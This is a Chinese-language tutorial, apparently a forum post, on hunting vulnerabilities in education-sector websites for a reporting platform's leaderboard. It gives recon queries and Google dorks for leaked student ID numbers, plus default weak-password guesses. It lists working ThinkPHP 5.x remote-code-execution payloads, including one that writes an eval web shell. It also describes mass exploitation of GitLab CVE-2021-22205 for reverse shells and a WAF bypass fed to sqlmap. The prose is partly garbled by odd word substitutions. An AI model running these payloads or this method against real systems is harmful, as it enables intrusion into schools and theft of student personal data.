现阶段,教诲行业漏洞报告平台吸收如下种别单位漏洞:
教诲部各省、自治区教诲厅、直辖市教委、各级教诲局学校教诲干系软件可以看到不仅是大学的资产、还有小学初中高中的教诲局的也可以交到上面、而资产不仅只有网站,也可以从小程序,app方面入手,不过这方面利用难度就要大一些
网络到别人网络不到的资产,就能挖到别人挖不到的洞。

奇安信的鹰图,fofa等
查询教诲资产的语法:domain="edu.cn" 表示搜索以edu.cn为结尾的资产,ip.isp="教诲",表示搜索教诲网段的资产,后者的搜索规模是比前者大很多
子域名搜集phpinfo等在线的搜集
OneForAll gayhub有名的子域名网络工具
目前支持一键网络:子域、子域常用端口、子域Title、子域状态、子域做事器等
site:.edu.cn 谷歌语法也可以帮助我们找到一些域名信息
whois反查:
whois反查(知道该注册人拥有哪些域名)
电话反查
域名多的情形下,还可以域名批量反查
末了可以把以上工具搜集到的子域名去重就得到了一份完全的大学网站域名资产,这种做法对渗透一些证书大学很有帮助。
学号、身份证网络这里就可以利用谷歌语法搜集
filetype:xls site:xxx.edu 身份证
有时候运气好就可以搜集到透露的身份证信息,+1rank(从来没碰着过)
如果能用这种方法搜集到对应的学号身份证,就可以进系统测试了!
或者直接连上vpn进内网上fscan扫描(这里的话可以通过上面说的搜集到的子域名去得到对应的内网ip地址,
谷歌插件wappalyzer:
image784×681 82.4 KB
c段旁站信息这里我利用这个工具Cscan,虽然有些小bug但是也是非常推举的
image874×462 91.2 KB
还有一些在线网站:潮汐指纹
js api接口创造这两个工具都可以去github下载
jsfind
Packer-Fuzzer(webpack 打包的前端都可以扫一下有惊喜
0x02我的一些骚思路废话不多说了
先说一下我感想熏染的挖洞难度:证书大学站> 资产多的普通大学 > 资产多的职业学院 > 有账号密码能进内网
以是我一开始是去找那种职业学院打的,大概是排行榜50多页的学校,可以用鹰图title="xxxx"进行搜集,
image868×428 55.6 KB
由于一些带专网站的安全意识比较差的,以是有时候能碰着那种弱口令进后台文件上传拿shell的,关于弱口令:用户名一样平常是admin ,密码一样平常是123456,admin,888888 三选一,不是的话可以撤退了
弱口令真的yyds
除了弱口令
然后说一下其他思路
比如说think5未开逼迫路由RCE,这种网站很多大学都存在,但是探求thinkphp符和条件的网站却很难,一种利用鹰图便是搜索默认图标hash值来探求,但是这种估计很难捡到,但是在闲逛的过程中看到路由规则类似thinkphp的可以考试测验一下(靠这个上了十多rank
image872×445 57.1 KB
一些payload:
5.1.x :
?s=index/\think\Request/input&filter[]=system&data=pwd?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
5.0.x :
?s=index/think\config/get&name=database.username # 获取配置信息?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
写入 shell
public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../shell.php&vars[1][]=<?php @eval($_REQUEST[cmd]);?>
然后然后,讲一下我一些思路,利用一些Nday来快速上分,或者挖掘逻辑漏洞实现通杀
关于Nday这里举俩个例子大家自行体会
比如说你知道有一个cve 比方说这个gitlab的cve:gitlab-CVE-2021-22205,gitlab显而易见的是很多高校都有这个gitlab的托管网站
以是说我们只要把所有gitlab edu上的资产全部搜集过来然后利用脚本逐一检测就了
这里说一下怎么搜集的
先从图标下手,限定edu域名:可以看到有17条资产
image867×425 55 KB
限定ip有27条资产
image877×422 107 KB
去除图标的有45条资产
image881×432 119 KB
把数据全部导出网络到一起,利用github上的脚本进行检测,这样就捡到俩个洞,由于gitlab这个cve是可以反弹shell的,以是12rank得手
image886×421 90.7 KB
再说一个比如说springboot未授权访问漏洞:
同上一样的方法:直接搜java白页,把数据导出->脚本检测
image879×440 94.3 KB
由于范围足够大以是也能有不小收成
image872×515 73.6 KB
剩下的可以自己探索,或者有更好的思路可以互换
逻辑漏洞这里可以利用jsfind脚本去探求一些js接口,可能会有未授权文件上传,ssrf等等,或者在登录抓取返回包把false改成true等操作,去实现登录绕过,总之来说便是要细心的阅读源码,找接口。
sql注入探求注入点方法:site:edu.cn inurl:xxx.php|jsp|asp?xxx= xxx可以自己发挥想象 ,或者在一些老系统登录,支付平台上都有可能存在注入
但是sql注入大多学校都上了waf,绕过waf不随意马虎,紧张的方法有内联,分段,以及垃圾字符添补等等
这里举一个绕安全狗的例子:
这里原来的参数是a和b,但是a,b参数的输入会被waf检测,通过拦截可以看出是常见的安全狗waf,以是这里可以多添加俩个参数:aa,bb(后端不会吸收这两个参数,但是安全狗不会检测注释里的内容,这样就大略绕过了),指定好注入点利用sqlmap轻松拿下。
sqlmap -u "xxx.aspx?aa=/&a=1&b=2&bb=/" -p "b" --random-agent